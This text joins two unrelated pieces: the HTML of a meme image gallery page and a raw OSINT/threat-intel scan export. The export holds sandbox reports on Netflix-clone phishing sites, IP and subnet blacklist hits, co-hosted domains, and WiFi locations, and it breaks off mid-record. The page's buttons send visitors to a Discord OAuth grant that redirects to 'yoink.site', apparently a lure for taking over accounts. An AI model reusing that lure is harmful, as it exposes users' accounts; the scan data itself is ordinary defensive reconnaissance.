<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.229): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:50:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://kuldeepsuthar007.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://kuldeepsuthar007.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://kuldeepsuthar007.github.io/netflixclone/', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://kuldeepsuthar007.github.io/netflixclone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c44_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_c44_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c44_IESQMMUTEX_0_331"\n "IsoScope_c44_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c44_IE_EarlyTabStart_0xdb4_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_c44_ConnHashTable<3140>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3140"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c44_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c44_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "45.57.90.1:443"\n "162.55.233.23:443"\n "142.250.191.42:443"\n "104.18.23.52:443"\n "203.192.208.115:443"\n "142.250.191.67:443"\n "172.67.75.130:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kuldeepsuthar007.github.io"\n "pngimg.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "kuldeepsuthar007.github.io"\n "occ-0-4023-2164.1.nflxso.net"\n "pngimg.com"\n "pro.fontawesome.com"\n "www.freepnglogos.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "netflix.com from your personal computer or on any" (Indicator: "dir "; File: "urlref_httpkuldeepsuthar007.github.ionetflixclone")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "netflix_PNG15_1_.png" has type "PNG image data 110 x 200 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm21llEw_1_.woff" has type "Web Open Font Format TrueType length 76672 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrJJLedA_1_.woff" has type "Web Open Font Format TrueType length 76604 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmv1plEw_1_.woff" has type "Web Open Font Format TrueType length 76404 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmr19lEw_1_.woff" has type "Web Open Font Format TrueType length 76076 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmy15lEw_1_.woff" has type "Web Open Font Format TrueType length 75364 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmg1hlEw_1_.woff" has type "Web Open Font Format TrueType length 75268 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm111lEw_1_.woff" has type "Web Open Font Format TrueType length 74932 version 1.1"- [targetUID: N/A]\n "pxiAyp8kv8JHgFVrJJLmE3tG_1_.woff" has type "Web Open Font Format TrueType length 72432 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm81xlEw_1_.woff" has type "Web Open Font Format TrueType length 71652 version 1.1"- [targetUID: N/A]\n "pxiEyp8kv8JHgFVrFJM_1_.woff" has type "Web Open Font Format TrueType length 66572 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDz8V1g_1_.woff" has type "Web Open Font Format TrueType length 66448 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLFj_V1g_1_.woff" has type "Web Open Font Format TrueType length 66376 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLEj6V1g_1_.woff" has type "Web Open Font Format TrueType length 66232 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLGT9V1g_1_.woff" has type "Web Open Font Format TrueType length 65760 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLCz7V1g_1_.woff" has type "Web Open Font Format TrueType length 65616 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLBT5V1g_1_.woff" has type "Web Open Font Format TrueType length 63856 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrLPTedA_1_.woff" has type "Web Open Font Format TrueType length 62300 version 1.1"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003140]\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003140]\n "~DFB2644CCC9D5F3046.TMP" has type "data"- Location: [%TEMP%\\~DFB2644CCC9D5F3046.TMP]- [targetUID: 00000000-00003140]\n "~DF5184AB3A29D52D81.TMP" has type "data"- Location: [%TEMP%\\~DF5184AB | 185.199.108.153 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.212): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00089.github.io | 185.199.111.153 |
| 2023-05-12 02:52:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://mudit-sharma-02.github.io/Netflix-page1-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_db4_IESQMMUTEX_0_303"\n "IsoScope_db4_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_db4_ConnHashTable<3508>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_db4_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_db4_IE_EarlyTabStart_0xca4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.96.161.50:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "mudit-sharma-02.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "urlref_httpsmudit-sharma-02.github.ioNetflix-page1-clone")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c2cba84b-ebb2-11ed-ab1e-080027e80c23}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd884a346d789fa2a.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd884a346d789fa2a.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c2cba84b-ebb2-11ed-ab1e-080027e80c23}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c2cba84d-ebb2-11ed-ab1e-080027e80c23}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df17b89474d30cf762.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab16BC.tmp" has type "data"- Location: [%TEMP%\\Cab16BC.tmp]- [targetUID: 00000000-00003320]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003508]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF17B89474D30CF762.TMP" has type "data"- [targetUID: 00000000-00003508]\n "~DF1833837FA777F3D3.TMP" has type "data"- Location: [%TEMP%\\~DF1833837FA777F3D3.TMP]- [targetUID: 00000000-00003508]\n "~DFD90E4BDAC01BA053.TMP" has type "data"- Location: [%TEMP%\\~DFD90E4BDAC01BA053.TMP]- [targetUID: 00000000-00003508]\n "~DFD884A346D789FA2A.TMP" has type "data"- Location: [%TEMP%\\~DFD884A346D789FA2A.TMP]- [targetUID: 00000000-00003508]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Netflix-page1-clone_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "RecoveryStore._C2CBA84B-EBB2-11ED-AB1E-080027E80C23_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_CCB71ED4-EBB2-11ED-AB1E-080027E80C23_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C2CBA84D-EBB2-11ED-AB1E-080027E80C23_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text"- [targetUID: N/A]\n "CUDEXGN3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CUDEXGN3.txt]- [targetUID: 00000000-00003508]\n "XRDVDHDV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XRDVDHDV.txt]- [targetUID: 00000000-00003508]\n "BPBU9WUV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BPBU9WUV.txt]- [targetUID: 00000000-00003508]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003320]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "1QS25WA0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1QS25WA0.txt]- [targetUID: 00000000-00003508]\n "YNW852G6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YNW852G6.txt]- [targetUID: 00000000-00003508]\n "3FCYEBS5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3FCYEBS5.txt]- [targetUID: 00000000-00003508]\n "W80A5L5S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W80A5L5S.txt]- [targetUID: 00000000-00003508]\n "Cab1893.tmp" has type "data"- Location: [%TEMP%\\Cab1893.tmp]- [targetUID: 00000000-00003320]\n "Cab1522.tmp" has type "data"- Location: [%TEMP%\\Cab1522.tmp]- [targetUID: 00000000-00003320]\n "Cab14A3.tmp" has type "data"- Location: [%TEMP%\\Cab14A3.tmp]- [targetUID: 00000000-00003320]\n "Cab1553.tmp" has type "data"- Location: [%TEMP%\\Cab1553.tmp]- [targetUID: 00000000-00003320]\n "Cab1ECF.tmp" has type "data"- Location: [%TEMP%\\Cab1ECF.tmp]- [targetUID: 00000000-00003320]\n "77EC63BDA74BD0D0E0426DC8F8008506" ha | 185.199.108.153 |
| 2023-05-12 02:45:57 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, 20149, United States, North America | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00ty.github.io | 185.199.111.153 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.135): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://funny.battleb0t.xyz/images/withat_2.jpg |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ToddNet (Net ID: 00:01:24:F2:5E:43) | 37.780462,-122.390564 |
| 2023-05-12 02:54:19 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | fluid.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Vthokies (Net ID: 00:0C:41:8A:86:76) | 39.0469, -77.4903 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:F0:AC:63:DA) | 41.8781, -87.6298 |
| 2023-05-12 02:59:52 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | fondon@fondon.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-890240065.html', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\IMM32.DLL" at base 1c030000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 1a0f0000\n "msedge.exe" loaded module "KERNEL32" at base 1c130000\n "msedge.exe" loaded module "C:\\WINDOWS\\TEMP\\VXOLE64.DLL" at base 130d0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 1c130000\n "msedge.exe" loaded module "COMBASE.DLL" at base cc30000\n "msedge.exe" loaded module "OLE32.DLL" at base 1b8a0000\n 